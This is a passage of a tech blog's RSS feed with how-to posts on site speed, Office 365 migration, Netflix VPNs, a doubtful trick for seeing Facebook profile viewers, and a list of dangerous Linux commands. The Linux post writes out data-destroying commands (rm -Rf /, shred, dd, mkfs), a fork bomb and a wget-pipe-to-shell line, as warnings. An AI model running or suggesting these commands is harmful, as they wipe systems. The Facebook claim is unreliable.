https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.49.38.png 1276w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
<h3>Conclusion</h3>
<p>At this point, you have the system which is ready to learn new hacking practice by yourself. In our next tutorials, we will try to bring you step-by-step guides how to learn ethical hacking practices. Stay tuned, like us on facebook and soon there will second part of <strong>Hacking for Beginners</strong> available. </p>
<p>The post <a href="https://itblogsec.com/hacking-for-beginners-1-install-the-kali-linux/">Hacking for beginners #1 &#8211; Install the Kali Linux</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/hacking-for-beginners-1-install-the-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Improving the Website Speed of a Media-Heavy Website</title>
		<link>https://itblogsec.com/improving-the-website-speed-of-a-media-heavy-website/</link>
					<comments>https://itblogsec.com/improving-the-website-speed-of-a-media-heavy-website/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 14 Aug 2019 19:04:39 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[website]]></category>
		<guid isPermaLink="false">https://itblogsec.com/?p=1196</guid>

					<description><![CDATA[<p>The common mindset when it comes to considering a website’s success is that owners need only worry about the type of content they want to publish. However, times have changed drastically, and so have consumers. There are now several factors that determine the success of a website. One of those is website speed.</p>
<p>The post <a href="https://itblogsec.com/improving-the-website-speed-of-a-media-heavy-website/">Improving the Website Speed of a Media-Heavy Website</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3 style="text-align: justify;">Improving the Website Speed of a Media-Heavy Website</h3>
<p style="text-align: justify;">The common mindset when it comes to considering a website’s success is that owners need only worry about the <strong>type of content they want to publish</strong>. However, times have changed drastically, and so have consumers. There are now <strong>several factors that determine the success</strong> of a website. <strong>One of those is website speed.</strong></p>
<p style="text-align: justify;">Website speed is essentially <strong>the time in which an entire page loads</strong> after being clicked. At this age, when internet speeds are reaching new heights, consumers won’t accept websites that take more than a few seconds to load. For <strong>image</strong> or <strong>media-heavy</strong> websites, increasing movement speed is a hard task. However, with a few simple tips, load times can be reduced dramatically.</p>
<p>Please check also a very interesting article <strong><a href="https://itblogsec.com/web-server-performance-benchmark-for-free/" target="_blank" rel="noopener noreferrer">Web server performance benchmark for free.</a></strong></p>
<h5 style="text-align: justify;"><strong>Avoid Auto-Play Videos</strong></h5>
<p style="text-align: justify;">Auto-play videos are despised by people for two reasons. The first is that it’s <strong>annoying to have a video pop up</strong> when you open a page. Another reason is that these videos hinder page loading time, as it takes a lot of resources and bandwidth to start the video. While <strong><a href="https://www.zdnet.com/article/hate-noisy-autoplaying-videos-google-chrome-will-finally-block-them-by-default/" target="_blank" rel="noopener noreferrer">Google and Apple cracked down</a> </strong>on such videos last year, they are still present on some websites.</p>
<p style="text-align: justify;">It’s best <strong>to avoid adding auto-play videos</strong> to satisfy the visitors of a website and to keep the <strong>website’s performance in top</strong> condition all at once. It’s best to give the visitors the option of watching a video instead of forcing them to watch it immediately.</p>
<h5 style="text-align: justify;"><strong>Use Appropriately Sized Images</strong></h5>
<p style="text-align: justify;">What most new website owners don’t know is that each website has its own proper dimensions for an image. For instance, there are some <strong>websites that use 900x1800px images</strong> whereas their website <strong>can only handle 300&#215;600 images.</strong> This forces the website to load more than it can handle, thus greatly affecting the speed.</p>
<p style="text-align: justify;">The right way to change the dimensions of an <strong>image is through the server-side of the website.</strong> Once done, those changes will be applied directly on the front-end. Understandably, some images may suffer from the smaller dimensions but visitors will prefer <strong>a lighting speed website</strong> over one with large images.</p>
<h5 style="text-align: justify;"><strong>Use the Right Image Format</strong></h5>
<p style="text-align: justify;">The most common image formats online are <strong>JPG</strong> and <strong>PNG</strong>. However, most web developers now prefer the new <strong><a href="https://insanelab.com/blog/web-development/webp-web-design-vs-jpeg-gif-png/" target="_blank" rel="noopener noreferrer">WebP</a></strong> format as it takes the best out of both JPG and PNG.</p>
<p style="text-align: justify;">In terms of compatibility, WebP is available for Chrome and Opera users, but it isn’t technically a universal format yet. Compared to PNG, <strong>WebP offers 26% smaller file sizes</strong> without sacrificing quality. Compared to JPG, it offers 25-35% smaller file sizes on the same image quality. That means <strong>WebP images will load faster</strong> than both of these formats every time.</p>
<h5 style="text-align: justify;"><strong>Optimize for Mobile</strong></h5>
<p style="text-align: justify;">A lot of web developers also forget to <strong>optimize their website for mobile platforms.</strong> Whenever a user visits a website that’s not optimized for <strong>mobile devices</strong>, that page will begin loading a desktop version which will take more time to load.</p>
<p style="text-align: justify;">Most web development platforms now have a <strong>feature that automatically optimizes a website for mobile use.</strong> These are great, as it takes a considerable amount of time to create a mobile version of a website. When mobile optimization happens, images are reduced drastically to accommodate the smaller screens of smartphones.</p>
<h5 style="text-align: justify;"><strong>Pick the Right Media</strong></h5>
<p style="text-align: justify;">In most cases, web developers have to make sacrifices regarding content. One of the sure ways to reduce loading speed is to <strong>simply reduce the amount of content that needs to load in a website.</strong> Website owners should carefully sift through their images and videos to see <strong>which ones aren’t exactly needed</strong> and could be <strong>removed</strong> to make way for loading speed.</p>
<p style="text-align: justify;">It’s also important to browse through the website to see if there are any <strong>images or videos that load several times on one page</strong>. Each piece of unnecessary media removed results in better loading times even if it&#8217;s just a fraction of a second.</p>
<p style="text-align: justify;">These <strong>tips combined will radically improve the loading speed</strong> of a website.</p>
<h5 style="text-align: justify;"><strong>But why is it important?</strong></h5>
<p style="text-align: justify;">According to <a href="https://hostingtribunal.com/blog/how-speed-affects-website/" target="_blank" rel="noopener noreferrer">recent statistics</a>, people <strong>leave websites</strong> that take <strong>over three seconds to load</strong>. This basically means that a <strong>website loses profit if it continues to perform slowly</strong>. This is just one figure that dictates the importance of website speed. These statistics show the eye-opening figures regarding <strong>how speed affects a website’s overall performance.</strong></p>
<p>Please check also interesting article: <strong><a href="https://itblogsec.com/10-of-the-best-plugins-to-keep-your-wordpress-site-safe/" target="_blank" rel="noopener noreferrer">10 of the best plugins to keep your Wordpress site safe.</a></strong></p>
<p><span style="font-size: 10pt;"><strong>source:</strong> <a href="https://hostingtribunal.com/blog/how-speed-affects-website/" target="_blank" rel="noopener noreferrer">https://hostingtribunal.com/</a></span></p>
<p>The post <a href="https://itblogsec.com/improving-the-website-speed-of-a-media-heavy-website/">Improving the Website Speed of a Media-Heavy Website</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/improving-the-website-speed-of-a-media-heavy-website/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Office 365 Migration Using New &#8211; MoveRequest cmdlets</title>
		<link>https://itblogsec.com/office-365-migration-using-new-moverequest-cmdlets/</link>
					<comments>https://itblogsec.com/office-365-migration-using-new-moverequest-cmdlets/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 05 Aug 2019 14:08:57 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[exchange]]></category>
		<category><![CDATA[office365]]></category>
		<guid isPermaLink="false">https://itblogsec.com/?p=1178</guid>

					<description><![CDATA[<p>When you are working in a hybrid environment where both on-premises Exchange Server and Office 365 are available, then it becomes beneficial for the Exchange Administrator to migrate some user mailboxes to Office 365 from Exchange Server because it provides much flexibility to access mailboxes from anywhere.</p>
<p>The post <a href="https://itblogsec.com/office-365-migration-using-new-moverequest-cmdlets/">Office 365 Migration Using New &#8211; MoveRequest cmdlets</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Office 365 Migration Using New &#8211; MoveRequest cmdlets</h2>
<p style="text-align: justify;">When you are working in a <strong>hybrid environment</strong> where both on-premises <strong>Exchange Server</strong> and <strong>Office 365</strong> are available, then it becomes beneficial for the Exchange Administrator to <strong>migrate some user mailboxes to Office 365</strong> from Exchange Server because it provides much flexibility to access mailboxes from anywhere.</p>
<p style="text-align: justify;">Now there are <strong>two methods</strong> which you can employ for the migration. First one is using the <strong>Exchange Admin Center</strong> where you create the migration endpoint and perform the batch migration. The second method is <strong>using the Exchange PowerShell command (using the MoveRequest)</strong> to migrate the batches mailboxes.</p>
<p style="text-align: justify;">To get the complete information regarding the migration, we will go through the migration process using Exchange Management Shell commands. </p>
<h3 style="text-align: justify;">Complete process:</h3>
<ol style="text-align: justify;">
<li>First, start the Exchange Management Shell.</li>
<li>Run the command:<br />
<strong><em>Set-ExecutionPolicy Unrestricted</em></strong></li>
</ol>
<p style="text-align: justify;">The command will allow you to run each kind of script even if it is digitally signed or not. It will ask you to make a choice, click Y.</p>
<ol style="text-align: justify;" start="3">
<li>Now, run the next command:<br />
<strong><em>$livecred = Get-Credential</em></strong></li>
</ol>
<p style="text-align: justify;">The command opens a login console where you need to input the Exchange Online credentials of the Administrator account to the $livecred variable.</p>
<ol style="text-align: justify;" start="4">
<li>Run the next command:<br />
<strong><em>$s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $cred -Authentication Basic -AllowRedirection</em></strong></li>
</ol>
<p style="text-align: justify;">The command first asks you to input the Administrator credentials, and then input the credential to create a new session.</p>
<ol style="text-align: justify;" start="5">
<li>Run the next command:<br />
<strong><em>$importresults= Import-PSSession $s</em></strong></li>
</ol>
<p style="text-align: justify;">The command will import the session to the respective variable. The process will take some seconds to complete. Just wait for a little and let it complete.</p>
<ol style="text-align: justify;" start="6">
<li>When you have created a session with the Exchange Online, you can start the move request:<br />
<strong><em>New-MoveRequest -Identity “Tony” -Remote -RemoteHostName “localmailserver.mydomain.com” -TargetDeliveryDomain mydomain.mail.onmicrosoft.com -RemoteCredential $importresults</em></strong></li>
</ol>
<ol style="text-align: justify;" start="7">
<li>Monitor the move request using the following command:<br />
<strong><em>Get-MoveRequest | Get-MoveRequestStatistics  </em></strong></li>
</ol>
<p style="text-align: justify;">The command will bring the details of the ongoing move request.</p>
<ol style="text-align: justify;" start="8">
<li>After completing the migration from Exchange to Office 365, you can remove the move request:<br />
<strong><em>Get-MoveRequest | Remove-MoveRequest  </em></strong></li>
</ol>
<h3 style="text-align: justify;"><strong>Important parameters:</strong></h3>
<p style="text-align: justify;">The MoveRequest command uses multiple parameters which are useful for different move request between a variety of source and destinations. Some of them are present below:</p>
<p style="text-align: justify;"><strong>AllowLargeItems<br />
</strong>It will allow you to mention the larger mailbox items than the target mailbox limit. You do not need to input value while using the parameter, and the data will be copied with any loss. The parameter is available only in on-premises Exchange Server.</p>
<p style="text-align: justify;"><strong>ArchiveOnly<br />
</strong>This parameter specifies that the user is moving only the archive folder associated with the mailbox.</p>
<p style="text-align: justify;"><strong>BadItemLimit<br />
</strong>It is an important parameter when the size of the mailbox or database is quite large; then there are chances that some items not suitable for migration. It specifies the total number of bad items before the move request fails. Missing or deleted items from the source mailbox are also counted as bad items and considered as not suitable for the migration.</p>
<p style="text-align: justify;"><strong>CompletedRequestAgeLimit<br />
</strong>The parameter notifies the total number of days after which the move request will get deleted automatically. The default limit is 30 days, and you can change it depending on your requirement.</p>
<p style="text-align: justify;"><strong>Identity<br />
</strong>Identity parameter specifies the name of the mailbox or user. Here, you can use Alias, SMTP address, Distinguished Name, User Principal Name (UPN).</p>
<p style="text-align: justify;"><strong>PrimaryOnly<br />
</strong>The PrimaryOnly parameter denotes that the move request migrates only the primary mailbox excluding the personal archive. Use this parameter only when there is a personal archive that need not be migrated.</p>
<h3 style="text-align: justify;"><strong>Conclusion</strong></h3>
<p style="text-align: justify;">Microsoft provides all the necessary methods to perform a secure Office 365 migration. But the complexity of these methods makes the job of Office 365 Administrator quite tough. But Kernel Migrator for Office 365 saves you from all these difficulties. As its name mentions, <a href="https://www.nucleustechnologies.com/office-365-migration/">Kernel Migrator for Office 365</a> is migration software for the Office 365 mailboxes, and public folders. It supports every plan of Office 365. You can perform a migration from Exchange to Office 365 or vice e versa. It provides suitable filters and scheduling options to run the migration under your control and provides a clean migration report after the migration.</p>
<p>The post <a href="https://itblogsec.com/office-365-migration-using-new-moverequest-cmdlets/">Office 365 Migration Using New &#8211; MoveRequest cmdlets</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/office-365-migration-using-new-moverequest-cmdlets/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Watch Netflix content from wherever</title>
		<link>https://itblogsec.com/watch-netflix-content-from-wherever/</link>
					<comments>https://itblogsec.com/watch-netflix-content-from-wherever/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 28 Jan 2019 19:17:47 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[netflix]]></category>
		<category><![CDATA[VPN]]></category>
		<guid isPermaLink="false">https://itblogsec.com/?p=1148</guid>

					<description><![CDATA[<p>Netflix is one of the best resources for entertaining content today, as it offers a subscription to one of the largest libraries of movies and series. Everybody wants to watch Netflix, everybody wants to get the newest and the best content and enjoy their winter evenings with the favorite series characters. However, not everything is so simple. </p>
<p>The post <a href="https://itblogsec.com/watch-netflix-content-from-wherever/">Watch Netflix content from wherever</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Watch Netflix content from wherever</h2>
<p style="text-align: left;">Netflix is one of the best resources for <strong>entertaining</strong> <strong>content today</strong>, as it offers a subscription to one of the largest libraries of <strong>movies</strong> and <strong>series</strong>. Everybody wants to watch Netflix, everybody wants to get the newest and the best content and enjoy their winter evenings with the favorite series characters. However, not everything is so simple. </p>
<p><img decoding="async" class="aligncenter" src="https://www.bestvpnrating.com/sites/default/files/netflix-bestvpnrating.jpg" alt="Netflix VPN" /></p>
<p style="text-align: justify;">Netflix offers their <strong>services in a range of countries</strong>, and citizens of both <strong>Europe</strong>, <strong>America</strong>, and other places enjoy this resource. But the company has <strong>contracts with the relevant authorities in each country</strong>, and promotes only certain content to users. In other words, in addition to some universal content available via Netflix, the users are <strong>offered specific movies and series</strong> created by the country they are located in. It means that users from other states cannot watch a local series sometimes, or local users cannot watch a series of a different state. For these cases, <a href="https://www.bestvpnrating.com/vpn-netflix" target="_blank" rel="noopener">VPN for <strong>Netflix</strong></a> is a solution.</p>
<p style="text-align: justify;">Netflix is a cool resource, but the <strong>limitation it puts on content by the geographical principle makes many users mad.</strong> To manage this problem, you can find more info on what software is the best to unlock Netflix for you. Since the world becomes more globalized, it is weird that an entertainment resource limits access from different countries to local content. Therefore, to enjoy Netflix to its fullest, download and use <strong>VPN</strong> solution. </p>
<p><img decoding="async" class="aligncenter" src="https://cloud.addictivetips.com/wp-content/uploads/2017/04/Unblock-Netflix-with-a-VPN-1.jpg" alt="Unblock Netflix with a VPN" /></p>
<p style="text-align: justify;">When you travel abroad and one evening decide to have a good time with a glass of wine and new episode of your favorite series that you have waited for a whole week, even a more stupid situation can occur. Since you are not in your home country, <strong>your Netflix subscription may not work the way to expected</strong>, and you cannot reach the local content of your home country from a different country! So, your evening is spoiled and you end up watching something random on YouTube. To avoid such fails, check<strong> <a href="https://www.bestvpnrating.com/" target="_blank" rel="noopener">Bestvpnrating.com</a></strong> for software that suits you, and enjoy your Netflix wherever you travel. </p>
<p class="has-small-font-size"><span style="font-size: 8pt;"><strong>source:</strong> <a href="https://latesthackingnews.com/2018/12/10/watch-netflix-content-from-wherever/" target="_blank" rel="noreferrer noopener" aria-label="https://latesthackingnews.com (opens in a new tab)">https://latesthackingnews.com</a></span></p>
<p>The post <a href="https://itblogsec.com/watch-netflix-content-from-wherever/">Watch Netflix content from wherever</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/watch-netflix-content-from-wherever/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to see who viewed your Facebook profile</title>
		<link>https://itblogsec.com/how-to-see-who-viewed-facebook-profile/</link>
					<comments>https://itblogsec.com/how-to-see-who-viewed-facebook-profile/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 18 Jul 2017 12:55:11 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[facebook]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=920</guid>

					<description><![CDATA[<p>Have you ever wondered who viewed your Facebook profile? I know you have done it many a time. Unfortunately, there are no formal ways to get the information of your profile visitors on Facebook. But don’t worry! We got a few unofficial ways to figure out who visited your Facebook profile. You don’t have to rack your brain for doing that. </p>
<p>The post <a href="https://itblogsec.com/how-to-see-who-viewed-facebook-profile/">How to see who viewed your Facebook profile</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>How to see who viewed your Facebook profile</h2>
<p style="text-align: justify;">Have you ever wondered who viewed your <strong>Facebook profile</strong>? I know you have done it many a time. Unfortunately, there are <strong>no formal ways</strong> to get the information of your profile visitors on Facebook. But don’t worry! We got a few <strong>unofficial ways to figure out who visited your Facebook profile</strong>. You don’t have to rack your brain for doing that. </p>
<h3>Can you really see who views your Facebook profile?</h3>
<p style="text-align: justify;">Yes, you probably can! Though there are no official ways, you can do it making use of a <strong>&#8220;who viewed my Facebook profile Chrome extension&#8221;</strong> or by installing another <strong>mobile/desktop application</strong>. Plenty of <em>&#8220;who viewed my Facebook profile extensions&#8221;</em> are available in the <strong>Chrome Store</strong>, also you can find many <strong>mobile/desktop applications</strong> available for downloading. But, please <strong>be careful</strong> as most applications is desired for the sole purpose &#8211; just to <strong>steal your personal details</strong>. Please <strong>do not enter</strong> any <strong>login credentials</strong> to any 3rd party extensions/applications once you are asked to do so.</p>
<p><strong>The safest way</strong> how to see who viewed your Facebook profile is doing it by <strong>manual searching in page source</strong>. Then you can exclude any personal details theft and you <strong>can be sure that your personal data are safe</strong>. Check method below how to do so.</p>
<h3>Using the Browser Only</h3>
<p style="text-align: justify;">You only <strong>need a browser</strong> in order to check who looks at your Facebook profile using this method. The steps are given below:</p>
<p style="text-align: justify;"><strong>Step 1:</strong> Visit <strong>facebook.com</strong> and <strong>log in</strong>. You will see your news feed. But you have to be at your timeline here. So click the first name of yours given on the blue navigation bar on top of the web page.</p>
<p><a href="https://itblogsec.com/wp-content/uploads/2017/07/fb_timeline.jpg"><img loading="lazy" decoding="async" class="border-image aligncenter wp-image-924 size-full" src="https://itblogsec.com/wp-content/uploads/2017/07/fb_timeline.jpg" alt="" width="224" height="495" srcset="https://itblogsec.com/wp-content/uploads/2017/07/fb_timeline.jpg 224w, https://itblogsec.com/wp-content/uploads/2017/07/fb_timeline-136x300.jpg 136w" sizes="(max-width: 224px) 100vw, 224px" /></a></p>
<p style="text-align: justify;"><strong>Step 2: </strong>Right click anywhere on an empty area. And look for the <strong>“view page source”</strong>, click on it. A new tab will open with lots and lots of  code. Don’t hesitate its very  simple just follow the next step.</p>
<p><a href="https://itblogsec.com/wp-content/uploads/2017/07/how-to-see-who-views-your-Facebook-profile-id.png"><img loading="lazy" decoding="async" class="border-image aligncenter wp-image-925 size-full" src="https://itblogsec.com/wp-content/uploads/2017/07/how-to-see-who-views-your-Facebook-profile-id.png" alt="" width="435" height="234" srcset="https://itblogsec.com/wp-content/uploads/2017/07/how-to-see-who-views-your-Facebook-profile-id.png 435w, https://itblogsec.com/wp-content/uploads/2017/07/how-to-see-who-views-your-Facebook-profile-id-300x161.png 300w" sizes="(max-width: 435px) 100vw, 435px" /></a></p>
<p style="text-align: justify;"><strong>Step 3:</strong> Now, you can see a long page with <strong>incomprehensible codes</strong>. Press <strong>Ctrl+ F</strong> at this step to get the search box. Type in <strong>“InitialChatFriendsList”</strong> without quotes and press Enter.</p>
<p style="text-align: justify;"><strong>Step 4: </strong>It will take you somewhere where <strong>ID’s are present</strong>. These  ID’s are none other than the ID’s or the users <strong>who has seen your Facebook profile</strong>.</p>
<p style="text-align: justify;"><strong>Step 5:</strong> Next, <strong>copy the single ID leaving the part after “-“</strong> as shown in above picture in blue color and paste it after the link <strong>“www.facebook.com/ID”</strong>.  For example: “www.facebook.com/1001675438”” and then press Enter. This will <strong>open a profile of a user</strong>, means this user has seen your profile.</p>
<p style="text-align: justify;"><strong>Step 6:</strong> As you can see in the image, you will see a bunch of numbers after this text. Those are the <strong>profile IDs of people who recently visited</strong> your Facebook profile. To see whose IDs are those, you need to add the same after ‘facebook.com/’ and enter into the address bar of your browser.</p>
<p style="text-align: justify;"><strong>NOTE:</strong> An ID which is coming in the first place has seen your Facebook profile recently than the <strong>ID appearing at 2nd  position</strong> and the <strong>ID at third position</strong> has seen before 4th one means the <strong>recent views of your Facebook profile</strong> comes first. But this trick doesn’t reveal that at what particular time or day the user has seen your Facebook profile.</p>
<h3>Conclusion</h3>
<p style="text-align: justify;">So with this trick you can <strong>check who keeps coming regularly on your Facebook profile</strong>. This trick only works on <strong>Google Chrome browser</strong>. Hoping that after following this article you get <strong>to know how to see who views your Facebook profile</strong>. However, you can <strong>share your thoughts and queries if you find any problem</strong> while following the above procedure. We are <strong>not sure about the legibility of this method and we cannot ensure 100% validity of output</strong>. Proceed at your own risk.</p>
<p><span style="font-size: 12pt;"><strong><span style="color: #ff0000;">ALSO READ:</span></strong></span> <a href="https://itblogsec.com/send-anonymous-emails-19-sites-keep-identity-hidden/" target="_blank" rel="noopener">Send Anonymous emails: 19 sites to keep your identity hidden </a></p>
<p><span style="font-size: 10pt;"><strong>source:</strong> http://www.dreamytricks.net</span></p>
<p>The post <a href="https://itblogsec.com/how-to-see-who-viewed-facebook-profile/">How to see who viewed your Facebook profile</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/how-to-see-who-viewed-facebook-profile/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>10 most dangerous linux commands you should never run</title>
		<link>https://itblogsec.com/10-dangerous-linux-commands-never-run/</link>
					<comments>https://itblogsec.com/10-dangerous-linux-commands-never-run/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 16 Jun 2017 19:36:50 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[unix]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=910</guid>

					<description><![CDATA[<p>There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.</p>
<p>The post <a href="https://itblogsec.com/10-dangerous-linux-commands-never-run/">10 most dangerous linux commands you should never run</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>10 most dangerous linux commands you should never run</h2>
<p style="text-align: justify;">There are many commands that can irreversibly damage your system. Some are less cryptic than others, some look like plain gibberish. Here is a list of dangerous commands on Linux, some permanent and some that can be recovered from.</p>
<h3>Irreversible Linux Commands – The Most Dangerous Ones</h3>
<pre class="lang:default decode:true">rm -Rf /</pre>
<p style="text-align: justify;">This command has gained a lot of notoriety, and is particularly dangerous. Thankfully, many UNIX systems have placed a safeguard into the rm command to ensure that it doesn’t happen accidentally or unintentionally. It might be confusing to think that something so destructive could be run accidentally, but it’s really as simple as using an uninitialized variable in a BASH script and not checking it before running the command.</p>
<pre class="lang:default decode:true">shred /dev/sda</pre>
<p style="text-align: justify;">Shred is a particularly dangerous command, unlike in the case of rm where anyone with some data recovery knowledge can data-carve the volume for any important files, shred does just as the name suggests. Shred feeds off of the operating systems /dev/random or /dev/urandom to generate random information. This information is then used to overwrite the drive in several passes rendering the data irretrievable. Even if you manage to interrupt the process before it gets through too much of your data, you’ll still have to rebuild your partition table and repair any filesystems that may have been touched. Shred is certainly a dangerous command if not used carefully.</p>
<pre class="lang:default decode:true">dd if=/dev/random of=/dev/sda</pre>
<p style="text-align: justify;">dd is an amazingly useful tool. It can be used for making clones of volumes, filesystems, writing images to disks, and even erasing <span class="skimlinks-unlinked">drives.The</span> above dd command accomplishes something that is about the same as shred, with the only differences being that shred is much faster and does multiple passes by default.</p>
<pre class="lang:default decode:true">mkfs.ext4 /dev/sda1</pre>
<p style="text-align: justify;">As Picasso said, “every act of creation is first an act of destruction,” and the same is true with mkfs. The fault here doesn’t lie with ext4 particularly, only that in order to create a new filesystem you must discard all existing data on the volume. This obviously isn’t a trouble on a shiny new disk, but it can bring a running system to its knees if it’s used without discretion.</p>
<pre class="lang:default decode:true">mv / /dev/null</pre>
<p style="text-align: justify;">This one is on par with our first. Anything written to /dev/null will write successfully. This means that this command is effectively the same as our first, although it might take longer to accomplish.</p>
<h3>Dangerous, Although Reversible Linux Commands</h3>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">:(){:|:&amp;};:</pre>
<p style="text-align: justify;"><span style="text-align: justify;">This cryptic string is BASH wizardry at it’s most evil and arcane. It’s known by the common name of the BASH Fork Bomb. Its other names are Rabbit Virus or Wabbit. Its construction is elegant and deadly, bringing any system to halt if the proper security measures aren’t put in place. The command simply creates a function named : with the :() in the beginning, it then goes on to define the contents of the function with {:|:&amp;}, this again is very simple as it only executes itself and pipes into another call of itself while backgrounding the process. Finally, the function definition is terminated with the ; and called with the :. To defend against this type of attack you need to implements precautions in the /etc/security/</span><span class="skimlinks-unlinked" style="text-align: justify;">limits.conf</span><span style="text-align: justify;"> configuration file.</span></p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">wget http://unknownsource.com/possiblydangerous.sh -O- | sh</pre>
<p style="text-align: justify;">This one should be a no-brainer. While wget is a useful tool, anything you download, especially executables, should be inspected if they come from an unknown or untrusted source. This command downloads the script and pipes it into sh which is usually just a symbolic link to BASH. So, anything in the script will be executed provided the user has sufficient privilege. The contents of the script would quite possibly be any of the previously mentioned commands.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">gunzip untrusted.gz</pre>
<p style="text-align: justify;">The seldom known Decompression Bomb is pretty unique in its approach. Compression relies on order in information to compress at higher ratios, considering that, a file filled with ones or zeros would be able to be compressed to a very high ratio, the resulting file could be orders smaller than the original. And that’s exactly what the Decompression Bomb is. It is a file that when decompressed will fill the disk space. On a Linux machine, this can be fatal to many system services that require logging or writing to a file. For that reason, decompressing any untrusted file can be very dangerous.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">command &gt; file.conf</pre>
<p style="text-align: justify;">The redirection feature of BASH is extremely useful, but when it’s used without care, it can end up wiping out an important configuration file. Remembering to distinguish between &gt; and &gt;&gt;, or replace and append, can be difficult to the beginner. It’s even common for professionals to overlook it and lose files. That’s why you should always double check, or even triple check, the commands you run.</p>
</div>
</div>
<div class="su-note">
<div class="su-note-inner su-clearfix">
<pre class="lang:default decode:true">^mistake^correction</pre>
<p style="text-align: justify;">This is a substitution to correct a mistake made in the previous command. It’s not something to keep at the top of your toolbox, but it’s something particularly handy when running long commands. The danger here comes from the fact that it can substitute malicious content into previously run commands, so it’s especially important to be diligent in inspecting both the previous command and the substitution.</p>
<p><span style="color: #ff0000;"><strong>| READ ALSO:</strong></span> <a href="https://itblogsec.com/how-to-put-currently-running-process-to-background/" target="_blank" rel="noopener">How to put currently running process to background</a></p>
</div>
</div>
<p style="text-align: justify;">Surely, there are many more commands that can disrupt or permanently impair a system. Did we miss any big ones? Do you know of any obscure ones? Let us know in the comments below.</p>
<p><span style="font-size: 10pt;"><strong>source: </strong><a href="https://fossbytes.com" target="_blank" rel="noopener">https://fossbytes.com</a></span></p>
<p>The post <a href="https://itblogsec.com/10-dangerous-linux-commands-never-run/">10 most dangerous linux commands you should never run</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/10-dangerous-linux-commands-never-run/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Web server performance benchmark for FREE</title>
		<link>https://itblogsec.com/web-server-performance-benchmark-for-free/</link>
					<comments>https://itblogsec.com/web-server-performance-benchmark-for-free/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 15 Feb 2017 14:46:19 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[benchmark]]></category>
		<category><![CDATA[web-server]]></category>
		<guid isPermaLink="false">http://itblogsec.com/?p=573</guid>

					<description><![CDATA[<p>Sometimes you need to find out what is average response time of your website. Such information is very useful and can lead you to optimize and tune your web-server for better performance. In the article we will introduce you possibilities how to make benchmark of your web-server for free.</p>
<p>The post <a href="https://itblogsec.com/web-server-performance-benchmark-for-free/">Web server performance benchmark for FREE</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Web server performance benchmark for FREE</h2>
<p style="text-align: justify;">Sometimes you need to find out what is average response time of your website. Such information is very useful and can lead you to optimize and tune your web-server for better performance. In the article we will introduce you possibilities how to make benchmark of your web-server for free.</p>
<h3><strong>1. ApacheBench</strong></h3>
